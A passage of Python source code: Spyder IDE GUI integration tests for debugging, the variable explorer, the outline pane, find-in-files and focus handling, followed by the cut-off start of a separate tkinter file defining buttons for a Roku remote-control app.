@pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform.startswith('linux'), reason="It fails sometimes on Linux") @pytest.mark.parametrize( "ipython", [True, False]) @pytest.mark.parametrize( "test_cell_magic", [True, False]) def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic): """Test the runcell command with cell magic.""" # Write code with a cell to a file write_file = tmpdir.mkdir("foo").join("bar.txt") assert not osp.exists(to_text_string(write_file)) if test_cell_magic: code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n" else: code = "\n\n%debug print()" if ipython: fn = "cell-test.ipy" else: fn = "cell-test.py" p = tmpdir.join(fn) p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Execute runcell with qtbot.waitSignal(shell.executed): shell.execute("runcell(0, r'{}')".format(to_text_string(p))) control = main_window.ipyconsole.get_widget().get_focus_widget() error_text = 'save this file with the .ipy extension' try: if ipython: if test_cell_magic: qtbot.waitUntil( lambda: 'Writing' in control.toPlainText()) # Verify that the code was executed assert osp.exists(to_text_string(write_file)) else: qtbot.waitSignal(shell.executed) assert error_text not in control.toPlainText() else: qtbot.waitUntil(lambda: error_text in control.toPlainText()) finally: if osp.exists(to_text_string(write_file)): os.remove(to_text_string(write_file)) @pytest.mark.slow @flaky(max_runs=3) def test_running_namespace(main_window, qtbot, tmpdir): """ Test that the running namespace is correctly sent when debugging in a new namespace. 
""" code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)") # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) code_editor.debugger.toogle_breakpoint(line_number=2) # Write b in the namespace with qtbot.waitSignal(shell.executed): shell.execute('b = 10') nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data) assert nsb.editor.source_model._data['b']['view'] == '10' # Start debugging with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # b should not be there (running namespace) and the local a should be 5 qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and nsb.editor.source_model._data['a']['view'] == '5', timeout=3000) assert 'b' not in nsb.editor.source_model._data assert nsb.editor.source_model._data['a']['view'] == '5' qtbot.waitUntil(shell.is_waiting_pdb_input) with qtbot.waitSignal(shell.executed): shell.pdb_execute('!c') # At the end, b should be back and a should be 10 qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data) assert nsb.editor.source_model._data['a']['view'] == '10' assert nsb.editor.source_model._data['b']['view'] == '10' @pytest.mark.slow @flaky(max_runs=3) def test_post_mortem(main_window, qtbot, tmpdir): """Test post mortem works""" # Check we can use custom complete for pdb shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = main_window.ipyconsole.get_widget().get_focus_widget() test_file = 
tmpdir.join('test.py') test_file.write('raise RuntimeError\n') with qtbot.waitSignal(shell.executed): shell.execute( "runfile(" + repr(str(test_file)) + ", post_mortem=True)") assert "IPdb [" in control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) def test_run_unsaved_file_multiprocessing(main_window, qtbot): """Test that we can run an unsaved file with multiprocessing.""" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables run_action = main_window.run_toolbar_actions[0] run_button = main_window.run_toolbar.widgetForAction(run_action) # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text( "import multiprocessing\n" "import traceback\n" 'if __name__ is "__main__":\n' " p = multiprocessing.Process(target=traceback.print_exc)\n" " p.start()\n" " p.join()\n" ) # This code should run even on windows # Start running qtbot.mouseClick(run_button, Qt.LeftButton) # Because multiprocessing is behaving strangly on windows, only some # situations will work. This is one of these situations so it shouldn't # be broken. if os.name == 'nt': qtbot.waitUntil( lambda: "Warning: multiprocessing" in shell._control.toPlainText()) else: # There is no exception, so the exception is None qtbot.waitUntil( lambda: 'None' in shell._control.toPlainText()) @pytest.mark.slow @flaky(max_runs=3) def test_varexp_cleared_after_kernel_restart(main_window, qtbot): """ Test that the variable explorer is cleared after a kernel restart. 
    """
    # NOTE(review): this is the tail of a test whose `def` line is above this
    # chunk; it verifies the variable explorer is cleared on kernel restart.
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Create a variable
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert the value is shown in the variable explorer
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
                    timeout=3000)

    # Restart Kernel
    with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
        shell.ipyclient.restart_kernel()

    # Assert the value was removed
    qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
                    timeout=3000)


@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_reset(main_window, qtbot):
    """
    Test that the variable explorer is cleared after triggering a
    reset in the IPython console and variable explorer panes.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Create a variable
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert the value is shown in the variable explorer
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
                    timeout=3000)

    # Trigger a reset in the variable explorer
    nsb.reset_namespace()

    # Assert the value was removed
    qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
                    timeout=3000)

    # Create the variable again
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert the value is shown in the variable explorer
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
                    timeout=3000)

    # Trigger a reset in the console
    shell.ipyclient.reset_namespace()

    # Assert the value was removed
    qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
                    timeout=3000)


@pytest.mark.slow
@flaky(max_runs=3)
def test_immediate_debug(main_window, qtbot):
    """
    Check if we can enter debugging immediately
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    with qtbot.waitSignal(shell.executed, timeout=SHELL_TIMEOUT):
        shell.execute("%debug print()")


@pytest.mark.slow
@flaky(max_runs=3)
def test_local_namespace(main_window, qtbot, tmpdir):
    """
    Test that the local namespace is not reset.

    This can happen if `frame.f_locals` is called on the current frame, as
    this has the side effect of discarding the pdb locals.
    """
    code = ("""
def hello():
    test = 1
    print('test ==', test)
hello()
""")

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)
    # Breakpoint on the print() line of the code above
    code_editor.debugger.toogle_breakpoint(line_number=4)

    nsb = main_window.variableexplorer.current_widget()

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Check `test` has a value of 1
    # Here we use "waitUntil" because `shell.executed` is emitted twice
    # One at the beginning of the file, and once at the breakpoint
    qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and
                    nsb.editor.source_model._data['test']['view'] == '1',
                    timeout=3000)

    # change value of test
    with qtbot.waitSignal(shell.executed):
        shell.execute("test = 1 + 1")

    # check value of test
    with qtbot.waitSignal(shell.executed):
        shell.execute("print('test =', test)")
    assert "test = 2" in shell._control.toPlainText()

    # change value of test
    with qtbot.waitSignal(shell.executed):
        shell.execute("test = 1 + 1 + 1")

    # do next
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!next")
    assert "test == 3" in shell._control.toPlainText()

    # Check the namespace browser is updated
    assert ('test' in nsb.editor.source_model._data and
            nsb.editor.source_model._data['test']['view'] == '3')


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
@pytest.mark.skipif(os.name == 'nt', reason='Times out on Windows')
def test_ordering_lsp_requests_at_startup(main_window, qtbot):
    """
    Test the ordering of requests we send to the LSP at startup when a
    project was left open during the previous session.

    This is a regression test for spyder-ide/spyder#13351.
    """
    # Wait until the LSP server is up.
    code_editor = main_window.editor.get_current_editor()
    qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000)

    # Wait until the initial requests are sent to the server.
    lsp = main_window.completions.get_provider('lsp')
    python_client = lsp.clients['python']
    qtbot.wait(5000)

    # Requests must arrive in exactly this order...
    expected_requests = [
        'initialize',
        'initialized',
        'workspace/didChangeConfiguration',
        'workspace/didChangeWorkspaceFolders',
        'textDocument/didOpen',
    ]

    # ...except that these requests may be interleaved after the given key.
    skip_intermediate = {
        'initialized': {'workspace/didChangeConfiguration'}
    }

    lsp_requests = python_client['instance']._requests
    start_idx = lsp_requests.index((0, 'initialize'))

    # Walk the recorded requests, matching them against the expected
    # sequence and tolerating the allowed intermediates.
    request_order = []
    expected_iter = iter(expected_requests)
    current_expected = next(expected_iter)
    for i in range(start_idx, len(lsp_requests)):
        if current_expected is None:
            break

        _, req_type = lsp_requests[i]
        if req_type == current_expected:
            request_order.append(req_type)
            current_expected = next(expected_iter, None)
        else:
            skip_set = skip_intermediate.get(current_expected, set({}))
            if req_type in skip_set:
                continue
            else:
                assert req_type == current_expected

    assert request_order == expected_requests


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
    'main_window',
    [{'spy_config': ('tours', 'show_tour_message', 2)}],
    indirect=True)
def test_tour_message(main_window, qtbot):
    """Test that the tour message displays and sends users to the tour."""
    # Wait until window setup is finished, which is when the message appears
    tours = main_window.get_plugin(Plugins.Tours)
    tour_dialog = tours.get_container()._tour_dialog
    animated_tour = tours.get_container()._tour_widget
    qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000)

    # Check that tour is shown automatically and manually show it
    assert tours.get_conf('show_tour_message')
    tours.show_tour_message(force=True)

    # Wait for the message to appear
    qtbot.waitUntil(lambda: bool(tour_dialog), timeout=5000)
    qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=2000)

    # Check that clicking dismiss hides the dialog and disables it
    qtbot.mouseClick(tour_dialog.dismiss_button, Qt.LeftButton)
    qtbot.waitUntil(lambda: not tour_dialog.isVisible(), timeout=2000)
    assert not tours.get_conf('show_tour_message')

    # Confirm that calling show_tour_message() normally doesn't show it again
    tours.show_tour_message()
    qtbot.wait(2000)
    assert not tour_dialog.isVisible()

    # Ensure that it opens again with force=True
    tours.show_tour_message(force=True)
    qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=5000)

    # Run the tour and confirm it's running and the dialog is closed
    qtbot.mouseClick(tour_dialog.launch_tour_button, Qt.LeftButton)
    qtbot.waitUntil(lambda: animated_tour.is_running, timeout=9000)
    assert not tour_dialog.isVisible()
    assert not tours.get_conf('show_tour_message')

    # Close the tour
    animated_tour.close_tour()
    qtbot.waitUntil(lambda: not animated_tour.is_running, timeout=9000)
    tour_dialog.hide()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_complex_project
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="Only works on Linux")
def test_update_outline(main_window, qtbot, tmpdir):
    """
    Test that files in the Outline pane are updated at startup and
    after switching projects.
    """
    # Show outline explorer
    outline_explorer = main_window.outlineexplorer
    outline_explorer.toggle_view_action.setChecked(True)

    # Get Python editor trees
    treewidget = outline_explorer.get_widget().treewidget
    editors_py = [
        editor for editor in treewidget.editor_ids.keys()
        if editor.get_language() == 'Python'
    ]

    # Wait a bit for trees to be filled
    qtbot.wait(25000)

    # Assert all Python editors are filled
    assert all(
        [
            len(treewidget.editor_tree_cache[editor.get_id()]) == 4
            for editor in editors_py
        ]
    )

    # Split editor
    editorstack = main_window.editor.get_current_editorstack()
    editorstack.sig_split_vertically.emit()
    qtbot.wait(1000)

    # Select file with no outline in split editorstack
    editorstack = main_window.editor.get_current_editorstack()
    editorstack.set_stack_index(2)
    editor = editorstack.get_current_editor()
    assert osp.splitext(editor.filename)[1] == '.txt'
    assert editor.is_cloned

    # Assert tree is empty
    editor_tree = treewidget.current_editor
    tree = treewidget.editor_tree_cache[editor_tree.get_id()]
    assert len(tree) == 0

    # Assert spinner is not shown
    assert not outline_explorer.get_widget()._spinner.isSpinning()

    # Hide outline from view
    outline_explorer.toggle_view_action.setChecked(False)

    # Remove content from first file
    editorstack.set_stack_index(0)
    editor = editorstack.get_current_editor()
    editor.selectAll()
    editor.cut()
    editorstack.save(index=0)

    # Assert outline was not updated
    qtbot.wait(1000)
    # NOTE(review): the next line is a bare comparison with no `assert`, so
    # it never actually checks anything — confirm intent and add `assert`.
    len(treewidget.editor_tree_cache[treewidget.current_editor.get_id()]) == 4

    # Set some files as session without projects
    prev_filenames = ["prev_file_1.py", "prev_file_2.py"]
    prev_paths = []
    for fname in prev_filenames:
        file = tmpdir.join(fname)
        file.write(read_asset_file("script_outline_1.py"))
        prev_paths.append(str(file))

    CONF.set('editor', 'filenames', prev_paths)

    # Close project to open that file automatically
    main_window.projects.close_project()

    # Show outline again
    outline_explorer.toggle_view_action.setChecked(True)

    # Wait a bit for its tree to be filled
    qtbot.wait(3000)

    # Assert the editors were filled
    assert all(
        [
            len(treewidget.editor_tree_cache[editor.get_id()]) == 4
            for editor in treewidget.editor_ids.keys()
        ]
    )

    # Remove test file from session
    CONF.set('editor', 'filenames', [])


@pytest.mark.slow
@flaky(max_runs=3)
def test_prevent_closing(main_window, qtbot):
    """
    Check we can bypass prevent closing.
    """
    code = "print(1 + 6)\nprint(1 + 6)\n"

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)
    code_editor.debugger.toogle_breakpoint(line_number=1)

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    CONF.set('ipython_console', 'pdb_prevent_closing', False)
    # Check we can close a file we debug if the option is disabled
    assert main_window.editor.get_current_editorstack().close_file()
    CONF.set('ipython_console', 'pdb_prevent_closing', True)
    # Check we are still debugging
    assert shell.is_debugging()


@pytest.mark.slow
@flaky(max_runs=3)
def test_continue_first_line(main_window, qtbot):
    """
    Check that debugging runs to completion (instead of stopping on the
    first line) when the pdb_stop_first_line option is disabled.
    """
    code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n"

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)

    CONF.set('ipython_console', 'pdb_stop_first_line', False)

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)
    # The debugging should finish
    qtbot.waitUntil(lambda: not shell.is_debugging())
    CONF.set('ipython_console', 'pdb_stop_first_line', True)

    # Check everything was executed
    qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText())
    assert "b = 9" in shell._control.toPlainText()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_outline_no_init(main_window, qtbot):
    """Check the Outline works for files in directories without __init__."""
    # Open file in one of our directories without an __init__ file
    spy_dir = osp.dirname(get_module_path('spyder'))
    main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py'))

    # Show outline explorer
    outline_explorer = main_window.outlineexplorer
    outline_explorer.toggle_view_action.setChecked(True)

    # Wait a bit for trees to be filled
    qtbot.wait(5000)

    # Get tree length
    treewidget = outline_explorer.get_widget().treewidget
    editor_id = list(treewidget.editor_ids.values())[1]

    # Assert symbols in the file are detected and shown
    assert len(treewidget.editor_tree_cache[editor_id]) > 0


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
                    reason="Flaky on Linux")
def test_pdb_without_comm(main_window, qtbot):
    """Check if pdb works without comm."""
    ipyconsole = main_window.ipyconsole
    shell = ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = ipyconsole.get_widget().get_focus_widget()

    # Closing the comm forces the frontend to fall back to plain pdb I/O
    with qtbot.waitSignal(shell.executed):
        shell.execute("get_ipython().kernel.frontend_comm.close()")
    shell.execute("%debug print()")
    qtbot.waitUntil(
        lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
    qtbot.keyClicks(control, "print('Two: ' + str(1+1))")
    qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.waitUntil(
        lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')

    assert "Two: 2" in control.toPlainText()

    # Press step button and expect a sig_pdb_step signal
    with qtbot.waitSignal(shell.sig_pdb_step):
        main_window.editor.debug_command("step")

    # Stop debugging and expect an executed signal
    with qtbot.waitSignal(shell.executed):
        main_window.editor.stop_debugging()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="Flaky on Mac and Windows")
def test_print_comms(main_window, qtbot):
    """Test warning printed when comms print."""
    # Write code with a cell to a file
    code = ("class Test:\n    @property\n    def shape(self):"
            "\n        print((10,))")
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()
    nsb = main_window.variableexplorer.current_widget()

    # Create some output from spyder call
    with qtbot.waitSignal(shell.executed):
        shell.execute(code)

    assert nsb.editor.source_model.rowCount() == 0

    with qtbot.waitSignal(shell.executed):
        shell.execute("a = Test()")

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)

    # Make sure the warning is printed
    assert ("Output from spyder call 'get_namespace_view':"
            in control.toPlainText())


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="UTF8 on Windows")
def test_goto_find(main_window, qtbot, tmpdir):
    """Test find goes to the right place."""
    # Use UTF8 only character to make sure positions are respected
    code = "we Weee wee\nWe\n🚫 wee"
    match_positions = [
        (0, 2),
        (3, 7),
        (8, 11),
        (12, 14),
        (18, 21)
    ]
    subdir = tmpdir.mkdir("find-sub")
    p = subdir.join("find-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))
    code_editor = main_window.editor.get_focus_widget()

    main_window.explorer.chdir(str(subdir))

    main_window.findinfiles.switch_to_plugin()
    findinfiles = main_window.findinfiles.get_widget()

    findinfiles.set_search_text("we+")
    findinfiles.search_regexp_action.setChecked(True)
    findinfiles.case_action.setChecked(False)
    with qtbot.waitSignal(findinfiles.sig_finished, timeout=SHELL_TIMEOUT):
        findinfiles.find()

    results = findinfiles.result_browser.data
    assert len(results) == 5
    assert len(findinfiles.result_browser.files) == 1

    file_item = list(findinfiles.result_browser.files.values())[0]
    assert file_item.childCount() == 5

    for i in range(5):
        item = file_item.child(i)
        findinfiles.result_browser.setCurrentItem(item)
        findinfiles.result_browser.activated(item)
        cursor = code_editor.textCursor()
        position = (cursor.selectionStart(), cursor.selectionEnd())
        assert position == match_positions[i]


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    os.name == 'nt',
    reason="test fails on windows.")
def test_copy_paste(main_window, qtbot, tmpdir):
    """Test copy paste."""
    code = (
        "if True:\n"
        "    class a():\n"
        "        def b():\n"
        "            print()\n"
        "        def c():\n"
        "            print()\n"
    )
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)

    # Test copy
    cursor = code_editor.textCursor()
    cursor.setPosition(69)
    cursor.movePosition(QTextCursor.End, QTextCursor.KeepAnchor)
    code_editor.setTextCursor(cursor)
    qtbot.keyClick(code_editor, "c", modifier=Qt.ControlModifier)
    assert QApplication.clipboard().text() == (
        "def c():\n            print()\n")
    assert CLIPBOARD_HELPER.metadata_indent == 8

    # Test paste in console
    qtbot.keyClick(shell._control, "v", modifier=Qt.ControlModifier)
    expected = "In [1]: def c():\n   ...:     print()"
    assert expected in shell._control.toPlainText()

    # Test paste at zero indentation
    qtbot.keyClick(code_editor, Qt.Key_Backspace)
    qtbot.keyClick(code_editor, Qt.Key_Backspace)
    qtbot.keyClick(code_editor, Qt.Key_Backspace)
    # Check again that the clipboard is ready
    assert QApplication.clipboard().text() == (
        "def c():\n            print()\n")
    assert CLIPBOARD_HELPER.metadata_indent == 8
    qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
    assert "\ndef c():\n    print()" in code_editor.toPlainText()

    # Test paste at automatic indentation
    qtbot.keyClick(code_editor, "z", modifier=Qt.ControlModifier)
    qtbot.keyClick(code_editor, Qt.Key_Tab)
    qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
    expected = (
        "\n"
        "    def c():\n"
        "        print()\n"
    )
    assert expected in code_editor.toPlainText()


@pytest.mark.slow
@pytest.mark.skipif(not running_in_ci(), reason="Only works in CIs")
def test_add_external_plugins_to_dependencies(main_window):
    """Test that we register external plugins in the main window."""
    external_names = []
    for dep in DEPENDENCIES:
        name = getattr(dep, 'package_name', None)
        if name:
            external_names.append(name)

    assert 'spyder-boilerplate' in external_names


@pytest.mark.slow
@flaky(max_runs=3)
def test_print_multiprocessing(main_window, qtbot, tmpdir):
    """Test print commands from multiprocessing."""
    # Write code with a cell to a file
    code = """
import multiprocessing
import sys
def test_func():
    print("Test stdout")
    print("Test stderr", file=sys.stderr)

if __name__ == "__main__":
    p = multiprocessing.Process(target=test_func)
    p.start()
    p.join()
"""
    p = tmpdir.join("print-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))

    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()

    # Click the run button
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(run_button, Qt.LeftButton)
    qtbot.wait(1000)

    assert 'Test stdout' in control.toPlainText()
    assert 'Test stderr' in control.toPlainText()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    os.name == 'nt',
    reason="ctypes.string_at(0) doesn't segfaults on Windows")
def test_print_faulthandler(main_window, qtbot, tmpdir):
    """Test printing segfault info from kernel crashes."""
    # Write code with a cell to a file
    code = """
def crash_func():
    import ctypes; ctypes.string_at(0)
crash_func()
"""
    p = tmpdir.join("print-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))

    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()

    # Click the run button
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)
    qtbot.mouseClick(run_button, Qt.LeftButton)

    qtbot.wait(5000)
    assert 'Segmentation fault' in control.toPlainText()
    assert 'in crash_func' in control.toPlainText()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("focus_to_editor", [True, False])
def test_focus_to_editor(main_window, qtbot, tmpdir, focus_to_editor):
    """Test that the focus_to_editor option works as expected."""
    # Write code with cells to a file
    code = """# %%
def foo(x):
    return 2 * x


# %%
foo(1)
"""
    p = tmpdir.join("test.py")
    p.write(code)

    # Load code in the editor
    main_window.editor.load(to_text_string(p))

    # Change focus_to_editor option
    main_window.editor.set_option('focus_to_editor', focus_to_editor)
    main_window.editor.apply_plugin_settings({'focus_to_editor'})
    code_editor = main_window.editor.get_current_editor()

    # Wait for the console to be up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()

    # Be sure the focus is on the editor before proceeding
    code_editor.setFocus()

    # Select the run cell button to click it
    run_cell_action = main_window.run_toolbar_actions[1]
    run_cell_button = main_window.run_toolbar.widgetForAction(run_cell_action)

    # Make sure we don't switch to the console after pressing the button
    if focus_to_editor:
        with qtbot.assertNotEmitted(
            main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
        ):
            qtbot.mouseClick(run_cell_button, Qt.LeftButton)
    else:
        qtbot.mouseClick(run_cell_button, Qt.LeftButton)
        qtbot.wait(1000)

    # Check the right widget has focus
    focus_widget = QApplication.focusWidget()
    if focus_to_editor:
        assert focus_widget is code_editor
    else:
        assert focus_widget is control

    # Give focus back to the editor before running the next test
    if not focus_to_editor:
        code_editor.setFocus()

    # Move cursor to last line to run it
    cursor = code_editor.textCursor()
    cursor.movePosition(QTextCursor.End, QTextCursor.MoveAnchor)
    cursor.movePosition(QTextCursor.PreviousBlock, QTextCursor.KeepAnchor)
    code_editor.setTextCursor(cursor)

    # Select the run selection button to click it
    run_selection_action = main_window.run_toolbar_actions[3]
    run_selection_button = main_window.run_toolbar.widgetForAction(
        run_selection_action)

    # Make sure we don't switch to the console after pressing the button
    if focus_to_editor:
        with qtbot.assertNotEmitted(
            main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
        ):
            qtbot.mouseClick(run_selection_button, Qt.LeftButton)
    else:
        qtbot.mouseClick(run_selection_button, Qt.LeftButton)
        qtbot.wait(1000)

    # Check the right widget has focus
    focus_widget = QApplication.focusWidget()
    if focus_to_editor:
        assert focus_widget is code_editor
    else:
        assert focus_widget is control


@pytest.mark.slow
@flaky(max_runs=3)
def test_focus_to_consoles(main_window, qtbot):
    """
    Check that we give focus to the text widget of our consoles after focus
    is given to their dockwidgets.
    """
    # Wait for the console to be up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_widget().get_focus_widget()

    # Show internal console
    console = main_window.get_plugin(Plugins.Console)
    console.toggle_view_action.setChecked(True)

    # Change to the IPython console and assert focus is given to its focus
    # widget
    main_window.ipyconsole.dockwidget.raise_()
    focus_widget = QApplication.focusWidget()
    assert focus_widget is control

    # Change to the Internal console and assert focus is given to its focus
    # widget
    console.dockwidget.raise_()
    focus_widget = QApplication.focusWidget()
    assert focus_widget is console.get_widget().get_focus_widget()


if __name__ == "__main__":
    pytest.main()
buttons.py
"""Tkinter buttons for a Roku remote-control UI.

Buttons look up the currently selected Roku device through their ``master``
widget and dispatch key presses / app launches on daemon threads so the UI
never blocks on network I/O.
"""

from abc import abstractmethod
from threading import Thread

import tkinter as tk

# Shared grid-layout constants so every button renders uniformly.
MARGIN = 5
BUTTON_HEIGHT = 1
BUTTON_WIDTH = 5
PADDING_X = "2m"
PADDING_Y = "1m"


class RokuButton(tk.Button):
    """Base class: a uniformly sized, grid-placed remote button."""

    def __init__(self, root, *args, **kwargs):
        super().__init__(root, *args, **kwargs)
        self.configure(height=BUTTON_HEIGHT, width=BUTTON_WIDTH)
        self.grid(
            sticky="nsew",
            padx=MARGIN,
            pady=MARGIN,
            ipadx=PADDING_X,
            ipady=PADDING_Y,
        )

    def shape(self, length, width):
        """Span ``length`` grid rows and ``width`` grid columns; returns self."""
        self.grid(rowspan=length, columnspan=width)
        return self

    # NOTE(review): this overrides tkinter.Widget.place() with an
    # incompatible, grid-based signature; callers must use these semantics.
    def place(self, row=0, col=0):
        """Move the button to grid cell (row, col); returns self for chaining."""
        self.grid(row=row, column=col)
        return self

    @abstractmethod
    def pressed(self, device):
        """Handle a button press. Subclasses must implement."""
        pass


class RokuActionButton(RokuButton):
    """Button that sends a remote keypress (e.g. Home, Up) to the device."""

    def __init__(self, root, action, *args, **kwargs):
        super().__init__(root, *args, **kwargs)
        self.action = action
        self.configure(
            height=BUTTON_HEIGHT + 1,
            text=action,
            command=self.pressed,
        )
        self.grid(
            sticky="nsew",
            padx=MARGIN,
            pady=MARGIN,
